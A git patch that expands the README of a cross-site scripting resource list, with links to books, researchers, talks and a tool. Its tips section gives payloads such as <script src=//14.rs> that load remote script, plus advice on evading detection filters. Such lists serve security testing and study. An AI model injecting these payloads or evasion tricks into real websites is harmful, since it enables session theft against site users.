From 1d33cd5ba5b7fc8cf67a87192935d24154f0d9bc Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Sun, 11 Mar 2018 21:21:25 +0530 Subject: [PATCH] Update README.md --- README.md | 69 ++++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 68 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 9b4944a..1402ee3 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,69 @@ # AwesomeXSS -Awesome XSS stuff +Awesome XSS stuff. + +Put this repo on watch. I will be updating it regularly. +### Awesome Books +- [XSS Cheat Sheet By Brute Logic](http://google.com) + +### Awesome Websites +- [brutelogic.com.br](http://brutelogic.com.br) +- [respectxss.blogspot.in](https://respectxss.blogspot.in/) + +### Awesome People +- [Rodolfo Assis](https://twitter.com/brutelogic) +- [Ashar Javed](https://twitter.com/soaj1664ashar) +- [Somdev Sangwan](https://twitter.com/s0md3v) I own this repo, I can write whatever the fuck I want :v + +### Awesome Reads +- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html) + +### Awesome Presentations +- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc) +- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos) +- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE) +- [Copy Pest](https://www.slideshare.net/x00mario/copypest) + +### Awesome Context Breaking + +#### Simple Context +``` + + +``` + +#### Attribute Context +``` +"> +"> +``` + +### Awesome Payloads +Come back later + + +### Awesome Tags & Event Handlers +Come back later + +### Awesome Methodology +Come back later + +### Awesome Tools +- (XSStrike)[http://xsstrike.tk/] + +### Awesome Tips & Tricks +- http:// can be shortened to // +- **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well. +- alert and other function don't need a value, so stop doing **alert(1)** and start doing **alert()** +- I have found that **confirm** is the least detected pop-up function so stop using alert. +- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"glt;** +- The shortest independent payload is **<embed src=//14.rs>** (19 chars)